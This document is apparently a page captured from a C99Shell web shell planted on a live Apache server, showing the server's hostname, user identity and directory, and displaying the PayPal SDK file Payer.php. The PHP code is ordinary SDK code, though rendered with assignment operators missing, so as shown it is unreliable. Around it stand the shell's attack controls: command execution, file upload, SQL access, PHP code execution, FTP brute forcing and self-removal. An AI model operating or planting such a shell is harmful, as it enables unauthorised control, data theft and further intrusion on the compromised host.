!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/   drwxr-xr-x
Free 28.61 GB of 117.98 GB (24.25%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Payer.php (6.73 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PayPal\Api;

use 
PayPal\Common\PayPalModel;

/**
 * Class Payer
 *
 * A resource representing a Payer that funds a payment.
 *
 * @package PayPal\Api
 *
 * @property string                          payment_method
 * @property string                          status
 * @property \PayPal\Api\FundingInstrument[] funding_instruments
 * @property string                          funding_option_id
 * @property \PayPal\Api\PayerInfo           payer_info
 */
class Payer extends PayPalModel
{
    
/**
     * Payment method being used - PayPal Wallet payment, Bank Direct Debit  or Direct Credit card.
     * Valid Values: ["credit_card", "bank", "paypal", "pay_upon_invoice", "carrier", "alternate_payment"]
     *
     * @param string $payment_method
     *
     * @return $this
     */
    
public function setPaymentMethod($payment_method)
    {
        
$this->payment_method $payment_method;
        return 
$this;
    }

    
/**
     * Payment method being used - PayPal Wallet payment, Bank Direct Debit  or Direct Credit card.
     *
     * @return string
     */
    
public function getPaymentMethod()
    {
        return 
$this->payment_method;
    }

    
/**
     * Status of payer's PayPal Account.
     * Valid Values: ["VERIFIED", "UNVERIFIED"]
     *
     * @param string $status
     *
     * @return $this
     */
    
public function setStatus($status)
    {
        
$this->status $status;
        return 
$this;
    }

    
/**
     * Status of payer's PayPal Account.
     *
     * @return string
     */
    
public function getStatus()
    {
        return 
$this->status;
    }

    
/**
     * Type of account relationship payer has with PayPal.
     * Valid Values: ["BUSINESS", "PERSONAL", "PREMIER"]
     *
     * @deprecated Not publicly available
     * @param string $account_type
     *
     * @return $this
     */
    
public function setAccountType($account_type)
    {
        
$this->account_type $account_type;
        return 
$this;
    }

    
/**
     * Type of account relationship payer has with PayPal.
     *
     * @deprecated Not publicly available
     * @return string
     */
    
public function getAccountType()
    {
        return 
$this->account_type;
    }

    
/**
     * Duration since the payer established account relationship with PayPal in days.
     *
     * @deprecated Not publicly available
     * @param string $account_age
     *
     * @return $this
     */
    
public function setAccountAge($account_age)
    {
        
$this->account_age $account_age;
        return 
$this;
    }

    
/**
     * Duration since the payer established account relationship with PayPal in days.
     *
     * @deprecated Not publicly available
     * @return string
     */
    
public function getAccountAge()
    {
        return 
$this->account_age;
    }

    
/**
     * List of funding instruments to fund the payment. 'OneOf' funding_instruments,funding_option_id to be used to identify the specifics of payment method passed.
     *
     * @param \PayPal\Api\FundingInstrument[] $funding_instruments
     *
     * @return $this
     */
    
public function setFundingInstruments($funding_instruments)
    {
        
$this->funding_instruments $funding_instruments;
        return 
$this;
    }

    
/**
     * List of funding instruments to fund the payment. 'OneOf' funding_instruments,funding_option_id to be used to identify the specifics of payment method passed.
     *
     * @return \PayPal\Api\FundingInstrument[]
     */
    
public function getFundingInstruments()
    {
        return 
$this->funding_instruments;
    }

    
/**
     * Append FundingInstruments to the list.
     *
     * @param \PayPal\Api\FundingInstrument $fundingInstrument
     * @return $this
     */
    
public function addFundingInstrument($fundingInstrument)
    {
        if (!
$this->getFundingInstruments()) {
            return 
$this->setFundingInstruments(array($fundingInstrument));
        } else {
            return 
$this->setFundingInstruments(
                
array_merge($this->getFundingInstruments(), array($fundingInstrument))
            );
        }
    }

    
/**
     * Remove FundingInstruments from the list.
     *
     * @param \PayPal\Api\FundingInstrument $fundingInstrument
     * @return $this
     */
    
public function removeFundingInstrument($fundingInstrument)
    {
        return 
$this->setFundingInstruments(
            
array_diff($this->getFundingInstruments(), array($fundingInstrument))
        );
    }

    
/**
     * Id of user selected funding option for the payment.'OneOf' funding_instruments,funding_option_id to be used to identify the specifics of payment method passed.
     *
     * @param string $funding_option_id
     *
     * @return $this
     */
    
public function setFundingOptionId($funding_option_id)
    {
        
$this->funding_option_id $funding_option_id;
        return 
$this;
    }

    
/**
     * Id of user selected funding option for the payment.'OneOf' funding_instruments,funding_option_id to be used to identify the specifics of payment method passed.
     *
     * @return string
     */
    
public function getFundingOptionId()
    {
        return 
$this->funding_option_id;
    }

    
/**
     * Default funding option available for the payment
     *
     * @deprecated Not publicly available
     * @param \PayPal\Api\FundingOption $funding_option
     *
     * @return $this
     */
    
public function setFundingOption($funding_option)
    {
        
$this->funding_option $funding_option;
        return 
$this;
    }

    
/**
     * Default funding option available for the payment
     *
     * @deprecated Not publicly available
     * @return \PayPal\Api\FundingOption
     */
    
public function getFundingOption()
    {
        return 
$this->funding_option;
    }

    
/**
     * Funding option related to default funding option.
     *
     * @deprecated Not publicly available
     * @param \PayPal\Api\FundingOption $related_funding_option
     *
     * @return $this
     */
    
public function setRelatedFundingOption($related_funding_option)
    {
        
$this->related_funding_option $related_funding_option;
        return 
$this;
    }

    
/**
     * Funding option related to default funding option.
     *
     * @deprecated Not publicly available
     * @return \PayPal\Api\FundingOption
     */
    
public function getRelatedFundingOption()
    {
        return 
$this->related_funding_option;
    }

    
/**
     * Information related to the Payer.
     *
     * @param \PayPal\Api\PayerInfo $payer_info
     *
     * @return $this
     */
    
public function setPayerInfo($payer_info)
    {
        
$this->payer_info $payer_info;
        return 
$this;
    }

    
/**
     * Information related to the Payer.
     *
     * @return \PayPal\Api\PayerInfo
     */
    
public function getPayerInfo()
    {
        return 
$this->payer_info;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0048 ]--